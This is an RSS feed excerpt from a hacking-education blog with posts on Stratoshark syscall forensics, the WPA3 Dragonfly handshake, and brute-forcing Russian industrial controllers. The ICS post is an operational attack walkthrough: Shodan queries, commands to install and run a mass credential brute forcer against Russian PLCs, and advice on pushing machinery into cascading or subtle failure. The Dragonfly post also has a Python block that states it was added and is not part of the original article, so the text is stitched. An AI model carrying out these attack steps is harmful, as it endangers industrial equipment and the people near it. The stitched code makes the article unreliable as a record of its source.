<p id="qta5r4118">When you first launch Stratoshark after installation, you’ll be greeted by its main interface, which deliberately mirrors Wireshark’s familiar layout to make transitioning between tools seamless. The application features a clean, well-organized workspace specifically designed for efficient system call analysis.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="579" src="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_first_look.avif" alt="" class="wp-image-15590" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_first_look.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_first_look-300x235.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h3 class="wp-block-heading" id="dqxew4766"><strong>Accessing Sample Captures</strong></h3>
<p id="lp6jc4768">To start exploring Stratoshark’s capabilities without capturing your own data, head over to the official website <a href="http://wiki.wireshark.org/Stratoshark" rel="noreferrer noopener" target="_blank"><u>wiki.wireshark.org/Stratoshark</u></a>, where you’ll find several sample SCAP files specifically created for learning purposes.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="268" src="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_samples.avif" alt="" class="wp-image-15591" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_samples.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_samples-300x109.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h3 class="wp-block-heading" id="pva7s5531"><strong>Analyzing SCAP Files with Stratoshark</strong></h3>
<p id="ov6435533">Upon opening a SCAP file in Stratoshark, you’ll immediately notice the interface resembles Wireshark. The key difference, however, lies in the event details pane (the Stratoshark equivalent to Wireshark’s packet details pane).</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="519" src="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_analyzing.avif" alt="" class="wp-image-15592" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_analyzing.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_analyzing-300x210.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p id="yv5m66500">This pane features a specialized set of expandable headers specifically designed for system call analysis. The most valuable headers for your analysis include:</p>
<ul id="g023u5537" class="wp-block-list">
<li><strong>System Event</strong> – works just like Wireshark’s “Frame” header
<ul class="wp-block-list">
<li><strong>Arrival Time</strong> – exact timestamp when the event occurred</li>
</ul>
</li>
<li><strong>Event Information</strong> – contains the most essential analysis data
<ul class="wp-block-list">
<li><strong>Direction</strong> – a right-facing caret (&gt;) shows a call from the application to the OS (request), while a left-facing caret (&lt;) indicates the OS response</li>
<li><strong>Type</strong> – shows which specific system call function is being invoked</li>
<li><strong>Arguments</strong> – displays the request or response values when applicable, varying by function called</li>
</ul>
</li>
<li><strong>Process Information</strong> – details about the process making or receiving the system call
<ul class="wp-block-list">
<li><strong>Name</strong> – identifies the process name</li>
<li><strong>Parent Name</strong> – shows which process spawned the current one (for example, in a system running Apache, you might see Name = kworker and Parent Name = apache)</li>
<li><strong>Process ID</strong> – matches the PID you’d see in tools like netstat or top, making it easy to correlate with other data sources</li>
</ul>
</li>
<li><strong>File Descriptor Information</strong> – when present, shows details about files the process is interacting with
<ul class="wp-block-list">
<li><strong>FD Name</strong> – since Linux treats almost everything as a file, this includes network sockets and other system resources</li>
</ul>
</li>
</ul>
<p id="m1hvr5590">Mastering these key components will help you effectively interpret system call data and extract valuable insights from your captures.</p>
<h2 class="wp-block-heading" id="vbmft8101"><strong>Summary</strong></h2>
<p id="5f5z27359">Stratoshark serves as a powerful companion to Wireshark, extending your digital forensic capabilities beyond network traffic analysis to system-level activity monitoring. By capturing and analyzing system calls directly from the Linux kernel, Stratoshark delivers crucial visibility into process-OS interactions—particularly valuable in today’s cloud-based, containerized environments where traditional network monitoring often falls short.</p><p>The post <a href="https://hackers-arise.com/network-forensics-getting-started-with-stratoshark/">Network Forensics: Getting Started With Stratoshark</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/network-forensics-getting-started-with-stratoshark/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>Wi-Fi Hacking: Inside DragonFly, the WPA3’s Next-Gen Wireless Authentication Protocol</title>
<link>https://hackers-arise.com/wi-fi-hacking-inside-dragonfly-the-wpa3s-next-gen-wireless-authentication-protocol/</link>
<comments>https://hackers-arise.com/wi-fi-hacking-inside-dragonfly-the-wpa3s-next-gen-wireless-authentication-protocol/#respond</comments>
<dc:creator><![CDATA[aircorridor]]></dc:creator>
<pubDate>Mon, 23 Jun 2025 16:07:06 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[IoT Hacking]]></category>
<category><![CDATA[Network Exploitation]]></category>
<category><![CDATA[Wi-Fi Hacking]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15761</guid>
<description><![CDATA[<p>Welcome back, aspiring cyberwarriors! On June 25, 2018, the Wi-Fi Alliance officially introduced WPA3, a new era for wireless security. While WPA2 has dominated the landscape for over a decade, the world has changed, threats have evolved, and so has the need for more robust authentication. At the core of WPA3’s improvements is the Dragonfly […]</p>
<p>The post <a href="https://hackers-arise.com/wi-fi-hacking-inside-dragonfly-the-wpa3s-next-gen-wireless-authentication-protocol/">Wi-Fi Hacking: Inside DragonFly, the WPA3’s Next-Gen Wireless Authentication Protocol</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
<content:encoded><![CDATA[<p>Welcome back, aspiring cyberwarriors!</p>
<p>On June 25, 2018, the Wi-Fi Alliance officially introduced WPA3, a new era for wireless security. While WPA2 has dominated the landscape for over a decade, the world has changed, threats have evolved, and so has the need for more robust authentication. At the core of WPA3’s improvements is the Dragonfly protocol – also known as Simultaneous Authentication of Equals (SAE).</p>
<p>Let’s pull back the curtain and see what Dragonfly is all about.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="678" height="747" src="https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_logo-1.png" alt="" class="wp-image-15766" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_logo-1.png 678w, https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_logo-1-272x300.png 272w" sizes="(max-width: 678px) 100vw, 678px" /></figure>
<h2 class="wp-block-heading">The Problem with WPA2 and PSK</h2>
<p>If you’ve spent any time in the field, you know that WPA2 relies on the Pre-Shared Key (PSK) method for authentication. It’s simple: everyone on the network uses the same password. But simplicity comes at a cost. Attackers can capture the handshake between a client and an access point and launch an offline brute-force attack. With modern GPUs or even cloud resources, this process is faster and easier than ever, especially if the password is weak or reused. To learn more about cracking WPA2-PSK, check out this <a href="https://hackers-arise.com/wireless-hacking-cracking-the-wpa2-psk-with-aircrack-ng/">article</a>.</p>
<p>This vulnerability has made WPA2-PSK networks a target for attackers, penetration testers, and anyone looking to test their password-cracking skills. The Wi-Fi Alliance knew this was a problem that needed fixing, especially as Wi-Fi becomes the backbone of everything from smart homes to industrial systems.</p>
<h2 class="wp-block-heading">Enter Dragonfly: The New Defender</h2>
<p>WPA3’s answer is the Dragonfly protocol. Unlike WPA2, Dragonfly doesn’t let attackers just grab a handshake and brute-force it at their leisure. Instead, it forces every password guess to be performed live, in real time, with the access point. This means that attackers can’t just passively collect handshakes and crack them later on their own hardware. Every attempt to guess a password requires direct interaction with the target network, making large-scale attacks noisy, slow, and much easier to detect.</p>
<p>Dragonfly is built on the mathematical foundations of elliptic curve cryptography (ECC) or finite field cryptography (FFC). The heart of its security lies in the discrete logarithm problem – a challenge so computationally hard that even the most well-funded adversaries struggle to solve it.</p>
<h2 class="wp-block-heading">How Dragonfly Works: The Protocol in Action</h2>
<p>To understand Dragonfly, you need to look at how it transforms a simple password into a fortress of cryptographic defenses. The process begins with both the client and the access point sharing a password—just like with WPA2. But what happens next is very different.</p>
<p>Instead of hashing the password and sending it over the air, both sides use the password to generate a unique mathematical element, either a point on an elliptic curve or an element in a finite field. This is where the so-called “hunting and pecking” algorithm comes into play. The goal here is to ensure that the same password always results in the same mathematical element, but that it’s computationally infeasible to reverse the process and recover the password from the element alone.</p>
<p>Once this shared element is established, the protocol moves into the commit phase. Both parties generate random private values and compute corresponding public values. These public values are then combined with the password-derived element to create commit messages, which are exchanged.</p>
<p>The commit phase is more than just a handshake. It establishes the cryptographic parameters for the session, ensures that both sides genuinely know the password, and starts the process of deriving the session keys that will protect all subsequent communication.</p>
<p>After the commit exchange, the protocol enters the confirm phase. Here, both sides compute confirmation values based on the exchanged messages and the derived shared secret. These values act as proof that both parties have successfully completed the authentication process and possess the correct password. If everything checks out, the authentication is finalized, and a fresh session key is established.</p>
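<p>The commit and confirm phases described above, as an added Python example that is not part of the original article or of any real SAE implementation: a toy run of the exchange between a station and an access point over a small constructed safe-prime group, with a simplified hunting-and-pecking step and a simplified confirm message (the group size, the hash choices and the message layout are assumptions for illustration).</p>

```python
import hashlib
import hmac
import secrets

# Toy finite-field group, constructed for illustration only: a safe prime
# p = 2q + 1, so the subgroup of order q is the set of quadratic residues.
# Real SAE uses large standardized groups (e.g. 2048-bit MODP or NIST P-256);
# at this size the discrete log is trivial, so nothing here is secure.
P = 2039
Q = 1019


def derive_password_element(password: bytes, p: int = P, q: int = Q) -> int:
    """Simplified 'hunting and pecking': deterministically map the password
    to an element of the order-q subgroup. Real SAE also mixes in both MAC
    addresses and always runs a fixed number of iterations so that timing
    does not depend on the password (the side channel the article mentions)."""
    for counter in range(1, 256):
        seed = hashlib.sha256(password + bytes([counter])).digest()
        x = int.from_bytes(seed, "big") % p
        pe = pow(x, (p - 1) // q, p)  # lift x into the order-q subgroup
        if pe > 1:  # reject the trivial element
            return pe
    raise ValueError("no password element found")


def commit(pe: int, rand=None, mask=None, p: int = P, q: int = Q):
    """Commit phase for one party: pick private rand and mask, publish
    scalar = rand + mask (mod q) and element = PE^(-mask). rand stays secret."""
    while True:
        r = rand if rand is not None else secrets.randbelow(q - 2) + 2
        m = mask if mask is not None else secrets.randbelow(q - 2) + 2
        scalar = (r + m) % q
        if scalar > 1 or rand is not None:  # SAE rejects scalar in {0, 1}
            break
    element = pow(pe, q - m, p)  # PE^(q - m) == PE^(-m) since PE has order q
    return r, scalar, element


def shared_secret(pe: int, my_rand: int, peer_scalar: int, peer_element: int, p: int = P) -> int:
    """K = (PE^peer_scalar * peer_element)^my_rand.
    PE^(peer_rand + peer_mask) * PE^(-peer_mask) = PE^peer_rand, so both
    sides end up with PE^(rand_sta * rand_ap), but only if both used the
    same PE, i.e. the same password."""
    base = (pow(pe, peer_scalar, p) * peer_element) % p
    return pow(base, my_rand, p)


def confirm_token(k: int, my_scalar: int, my_element: int, peer_scalar: int, peer_element: int) -> str:
    """Confirm phase: HMAC over both commits, keyed with a key derived from K.
    Simplified from SAE's confirm, which also includes a send-confirm counter."""
    kck = hashlib.sha256(k.to_bytes(4, "big")).digest()
    msg = b"".join(v.to_bytes(4, "big") for v in (my_scalar, my_element, peer_scalar, peer_element))
    return hmac.new(kck, msg, hashlib.sha256).hexdigest()


def sae_handshake(sta_password: bytes, ap_password: bytes,
                  sta_rand=None, sta_mask=None, ap_rand=None, ap_mask=None) -> dict:
    """Run the full exchange between a station (STA) and an access point (AP).
    Fixed rand/mask values may be passed in to make a run reproducible."""
    pe_sta = derive_password_element(sta_password)
    pe_ap = derive_password_element(ap_password)

    # Commit exchange: each side sends (scalar, element) over the air.
    r_sta, s_sta, e_sta = commit(pe_sta, sta_rand, sta_mask)
    r_ap, s_ap, e_ap = commit(pe_ap, ap_rand, ap_mask)

    # Each side derives K locally; the private rand never leaves the device.
    k_sta = shared_secret(pe_sta, r_sta, s_ap, e_ap)
    k_ap = shared_secret(pe_ap, r_ap, s_sta, e_sta)

    # Confirm exchange: each side proves it derived the same K and checks the peer.
    c_sta = confirm_token(k_sta, s_sta, e_sta, s_ap, e_ap)
    c_ap = confirm_token(k_ap, s_ap, e_ap, s_sta, e_sta)
    sta_accepts = hmac.compare_digest(c_ap, confirm_token(k_sta, s_ap, e_ap, s_sta, e_sta))
    ap_accepts = hmac.compare_digest(c_sta, confirm_token(k_ap, s_sta, e_sta, s_ap, e_ap))

    return {
        "keys_match": k_sta == k_ap,
        "sta_accepts": sta_accepts,
        "ap_accepts": ap_accepts,
        # Everything a passive eavesdropper can capture: no rand, no K.
        "over_the_air": {"sta_commit": (s_sta, e_sta), "ap_commit": (s_ap, e_ap),
                         "sta_confirm": c_sta, "ap_confirm": c_ap},
    }


if __name__ == "__main__":
    print("same password:", sae_handshake(b"correct horse", b"correct horse"))
    print("wrong password:", sae_handshake(b"correct horse", b"wrong guess"))
```

<p>Running it with a different password on one side shows both confirm checks failing, and the captured commit and confirm values alone never contain the private rand needed to recompute K.</p>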
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="667" height="570" src="https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_handshake.png" alt="" class="wp-image-15763" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_handshake.png 667w, https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_handshake-300x256.png 300w" sizes="(max-width: 667px) 100vw, 667px" /><figcaption class="wp-element-caption">WPA3’s Dragonfly handshake</figcaption></figure>
<h2 class="wp-block-heading">The Cryptography Behind Dragonfly</h2>
<p>Dragonfly’s cryptographic operations are designed to offer strong resistance against a wide range of attacks, while still being efficient enough to run on everything from laptops to IoT sensors. The protocol supports both elliptic curve and finite field groups, giving implementers flexibility to choose what best fits their devices and threat models.</p>
<p>Elliptic curve implementations are typically favored for their combination of security and efficiency. Well-known curves like P-256, P-384, or P-521 are commonly used, offering strong protection without overtaxing device resources. Even resource-constrained devices can handle the necessary operations within acceptable timeframes.</p>
<p>For those who opt for finite field cryptography, Dragonfly uses modular arithmetic over carefully chosen prime fields. The selection of these fields follows established cryptographic standards, ensuring that the discrete logarithm problem remains hard to solve – even for attackers with specialized hardware or distributed computing power.</p>
<h2 class="wp-block-heading">Security Properties That Matter</h2>
<p>One of Dragonfly’s standout features is perfect forward secrecy (PFS). This means that even if someone manages to compromise the shared password at some point in the future, all previous communication sessions remain secure. This is achieved by generating ephemeral keys for each authentication session, derived from random values generated during each protocol run. It’s a critical property, especially in environments where passwords might be shared among many users or left unchanged for long periods.</p>
<p>Another major innovation is Dragonfly’s resistance to offline dictionary attacks. In traditional schemes, an attacker who captures authentication messages can try as many password guesses as they want, offline, without ever alerting the network. Dragonfly changes the rules: verifying a password guess requires active participation from both parties. The captured messages alone don’t provide enough information for an attacker to verify guesses independently. This fundamentally changes the threat landscape for wireless networks.</p>
<p>Mutual authentication is another core benefit. Both the client and the access point must prove knowledge of the shared password. This prevents rogue access points and client impersonation, shutting down a wide range of attacks that have plagued Wi-Fi networks for years.</p>
<p>The protocol also includes robust key derivation mechanisms. Session keys are generated using the shared secret established during authentication, combined with random values and protocol parameters to ensure uniqueness and unpredictability. These keys are suitable for use with a variety of encryption algorithms, providing strong protection for all subsequent communication.</p>
<h2 class="wp-block-heading">Real-World Implementation: What It Means for Devices</h2>
<p>Implementing Dragonfly does require more computational effort than WPA2-PSK, but modern hardware is up to the task. Elliptic curve operations, in particular, are efficient and well-supported by today’s wireless chipsets. Even battery-powered devices can handle Dragonfly’s workload without noticeable impact on performance or user experience.</p>
<p>Memory requirements are modest, too. Devices need to store cryptographic parameters, temporary values for calculations, and buffers for protocol messages. For most modern devices, this is no problem. Even in the world of IoT, where resources are tight, Dragonfly can be implemented with careful optimization.</p>
<p>Interoperability is crucial. Dragonfly is specified in several standards, including IEEE 802.11, RFC 7664, and Wi-Fi Alliance documents. Implementers must follow these standards closely to ensure that devices from different manufacturers can communicate securely. This includes agreeing on cryptographic groups, message formats, error handling, and security parameter selection.</p>
<h2 class="wp-block-heading">Known Limitations and Ongoing Research</h2>
<p>While Dragonfly is a huge step forward, it’s not invincible. Researchers have identified potential side-channel vulnerabilities in some implementations, where timing or cache-based attacks could leak information about the password element. These attacks are complex and require close proximity or advanced capabilities, but they’re a reminder that implementation matters as much as protocol design.</p>
<p>Another concern is the so-called “transition mode” in WPA3, where networks support both WPA2 and WPA3 for compatibility. This can open the door to downgrade attacks, where an attacker forces a client to use the less secure WPA2 handshake, then cracks the password offline as before. The best defense is to use WPA3-only mode whenever possible.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="628" height="340" src="https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_downgrade_attack.png" alt="" class="wp-image-15764" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_downgrade_attack.png 628w, https://hackers-arise.com/wp-content/uploads/2025/06/dragonfly_downgrade_attack-300x162.png 300w" sizes="(max-width: 628px) 100vw, 628px" /><figcaption class="wp-element-caption">Dictionary attack against WPA3-SAE when it is operating in transition mode, by attempting to downgrade the client into directly using WPA2’s 4-way handshake.</figcaption></figure>
<p>Implementation bugs are another risk. As with any complex protocol, mistakes in coding or configuration can introduce vulnerabilities. Regular updates, thorough testing, and adherence to best practices are essential to maintain security.</p>
<h2 class="wp-block-heading">Summary</h2>
<p>The introduction of Dragonfly marks a major milestone in the evolution of wireless security. By fundamentally changing how passwords are used and protected, it makes life much harder for attackers and raises the bar for everyone. But as always, security is a moving target. New attacks and vulnerabilities will emerge, and defenders must stay vigilant.</p>
<p>To learn more about Wi-Fi hacking attend our <a href="https://hackers-arise.com/schedule/">online class July 22-24</a>.</p>
<p>The post <a href="https://hackers-arise.com/wi-fi-hacking-inside-dragonfly-the-wpa3s-next-gen-wireless-authentication-protocol/">Wi-Fi Hacking: Inside DragonFly, the WPA3’s Next-Gen Wireless Authentication Protocol</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/wi-fi-hacking-inside-dragonfly-the-wpa3s-next-gen-wireless-authentication-protocol/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>SCADA/ICS Security in Cyber Warfare: Exposing Vulnerabilities in Russian ICS Infrastructure</title>
<link>https://hackers-arise.com/scada-ics-security-in-cyber-warfare-exposing-vulnerabilities-in-russian-ics-infrastructure/</link>
<comments>https://hackers-arise.com/scada-ics-security-in-cyber-warfare-exposing-vulnerabilities-in-russian-ics-infrastructure/#respond</comments>
<dc:creator><![CDATA[aircorridor]]></dc:creator>
<pubDate>Sun, 22 Jun 2025 18:39:14 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[SCADA/ICS Hacking]]></category>
<category><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15565</guid>
<description><![CDATA[<p>Welcome back, aspiring cyberwarriors. In today’s article we will explore Russian industrial control systems (ICS), revealing vulnerabilities waiting to be exploited. These systems are critical, yet security often remains an afterthought. Even Russia, which has spent years aggressively hardening its cybersecurity in preparation for its invasion of Ukraine, continues to suffer from vulnerabilities and basic […]</p>
<p>The post <a href="https://hackers-arise.com/scada-ics-security-in-cyber-warfare-exposing-vulnerabilities-in-russian-ics-infrastructure/">SCADA/ICS Security in Cyber Warfare: Exposing Vulnerabilities in Russian ICS Infrastructure</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
<content:encoded><![CDATA[<p id="foo">Welcome back, aspiring cyberwarriors.</p>
<p id="wgz2n3069">In today’s article we will explore Russian industrial control systems (ICS), revealing vulnerabilities waiting to be exploited. These systems are critical, yet security often remains an afterthought. Even Russia, which has spent years aggressively hardening its cybersecurity in preparation for its invasion of Ukraine, continues to suffer from vulnerabilities and basic negligence by security engineers and administrators.</p>
<h2 class="wp-block-heading" id="xh85o96"><strong>A Brief Overview of SCADA and PLCs</strong></h2>
<p id="jhm3425743">SCADA systems (Supervisory Control and Data Acquisition) are a type of ICS designed for supervising and controlling industrial operations over long distances. Because they rely on networks to connect remote equipment, SCADA systems are more vulnerable to cyberattacks than centralized ICS. At the core of SCADA operations are specialized computers called PLCs (Programmable Logic Controllers). These devices directly manage machinery and processes by collecting data from sensors (such as pressure, temperature, or voltage sensors) and then executing actions based on their programming, such as closing a valve, triggering cooling systems, or initiating an emergency shutdown. This means that once a PLC is compromised, it can be used to damage physical equipment.</p>
<p id="3k4ds62">In this article, in cooperation with a student from the Cyber Cossacks School – Citadel, we will demonstrate how relatively easy it is to access Russian PLCs.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="350" height="228" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_logo.avif" alt="" class="wp-image-15567" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_logo.avif 350w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_logo-300x195.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" /></figure>
<h2 class="wp-block-heading" id="wvc4r106618"><strong>Step #1: Find Systems With 401 Response</strong></h2>
<p id="2h1d2114">To search, let’s use the well-known Shodan: <strong>country:ru ‘401’</strong></p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="453" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_search.avif" alt="" class="wp-image-15568" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_search.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_search-300x184.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p id="0surm209">Over 144,000 results!</p>
<p id="w4sz9218">We need to copy the ports, along with the number of results for each, into a file, for example unfiltered.txt.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="458" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_results.avif" alt="" class="wp-image-15569" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_results.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_results-300x186.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="297" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_results_save.avif" alt="" class="wp-image-15570" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_results_save.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_shodan_results_save-300x120.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h2 class="wp-block-heading" id="wlgyx331"><strong>Step #2: Filter The Ports</strong></h2>
<p id="6mjva342">First, we need to download the mass 401 brute forcer called bonappeti.</p>
<p id="8dlq1344"><strong>kali> git clone https://github.com/soupbone89/bonappeti.git</strong></p>
<p id="lj87a347"><strong>kali> cd bonappeti</strong></p>
<p id="brw4z349">Here, you will find the filter.py script, which is used to filter ports. Use it by providing your file with ports from Shodan as input.</p>
<p id="0r1yo353"><strong>kali> python3 filter.py unfiltered.txt</strong></p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="354" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_filter.avif" alt="" class="wp-image-15571" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_filter.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_filter-300x144.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p id="s3mth627">As a result, we got a file with a list of ports.</p>
<h2 class="wp-block-heading" id="ir3aj649"><strong>Step #3: Start Brute Forcing</strong></h2>
<p id="kwxn2651">The bonappeti repository has a bruteforce.py file that uses the shef utility to pull IP addresses from Shodan. Let’s install it:</p>
<p id="raywb655"><strong>kali> git clone </strong><a href="https://github.com/1hehaq/shef.git" rel="noreferrer noopener" target="_blank"><strong>https://github.com/1hehaq/shef.git</strong></a><strong> && cd shef && chmod +x shef.sh && sudo mv shef.sh /bin/shef && cd .. && rm -rf shef</strong></p>
<p id="epvh2663">If you open the brute force script, you can see that it searches for Russian IP addresses by default.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="180" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_brute_script.avif" alt="" class="wp-image-15572" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_brute_script.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_brute_script-300x73.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p>In the httpbrute directory, you can find files with logins and passwords.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="675" height="555" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_brute_data.avif" alt="" class="wp-image-15573" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_brute_data.avif 675w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_brute_data-300x247.jpg 300w" sizes="(max-width: 675px) 100vw, 675px" /></figure>
<p id="umdbh1317">Next, we’re ready to start the brute force.</p>
<p id="j1t8u1353"><strong>kali> python3 bruteforce.py</strong></p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="352" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_run.avif" alt="" class="wp-image-15574" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_run.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_run-300x143.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p id="stxbj1622">Successful attempts are written to success.txt. To filter out false positives, use:</p>
<p id="uviwf1661"><strong>kali> cat success.txt | grep -v false</strong></p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="350" height="138" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_results.avif" alt="" class="wp-image-15575" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_results.avif 350w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_results-300x118.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" /></figure>
<p>As a result, the following PLC was found using its default password.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="326" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_plc1.avif" alt="" class="wp-image-15576" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_plc1.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_plc1-300x132.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="321" src="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_plcs2.avif" alt="" class="wp-image-15577" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_plcs2.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/ru_ics_plcs2-300x130.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p id="6fqrr110240">Once you have access you can change the emergency temperature thresholds, alarms, sensor settings, and ultimately push machinery into unstable operating states. From this point, two strategies emerge: initiate a cascading failure or engineer gradual, subtle damage.</p>
<h2 class="wp-block-heading" id="ai3jf2555"><strong>Summary</strong></h2>
<p id="yw84w2597">While technological solutions are important, the most critical defense lies in changing the mindset and practices of those responsible for maintaining these critical infrastructure systems. However, if the Russians don’t change anything by themselves, we won’t insist.</p><p>The post <a href="https://hackers-arise.com/scada-ics-security-in-cyber-warfare-exposing-vulnerabilities-in-russian-ics-infrastructure/">SCADA/ICS Security in Cyber Warfare: Exposing Vulnerabilities in Russian ICS Infrastructure</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/scada-ics-security-in-cyber-warfare-exposing-vulnerabilities-in-russian-ics-infrastructure/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>VPN Hacking: Authentication Bypass on Fortinet Fortios</title>
<link>https://hackers-arise.com/vpn-hacking-authentication-bypass-on-fortinet-fortios/</link>
<comments>https://hackers-arise.com/vpn-hacking-authentication-bypass-on-fortinet-fortios/#respond</comments>
<dc:creator><![CDATA[OTW]]></dc:creator>
<pubDate>Sat, 21 Jun 2025 15:59:42 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Hacking]]></category>
<category><![CDATA[IoT Hacking]]></category>
<category><![CDATA[Pentesting]]></category>
<category><![CDATA[Uncategorized]]></category>
<category><![CDATA[VPN]]></category>
<category><![CDATA[Vulnerabilities]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15209</guid>
<description><![CDATA[<p>Welcome back, my aspiring cyberwarriors! The cybersecurity industry is dependent upon a few developers to produce routers and VPN’s to keep our data safe. Unfortunately, many of these developers have failed to provide products that take into account even the most rudimentary cybersecurity practices. Many of them are like Swiss cheese, full of vulnerable holes […]</p>
<p>The post <a href="https://hackers-arise.com/vpn-hacking-authentication-bypass-on-fortinet-fortios/">VPN Hacking: Authentication Bypass on Fortinet Fortios</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
<content:encoded><![CDATA[<p>Welcome back, my aspiring cyberwarriors!</p>
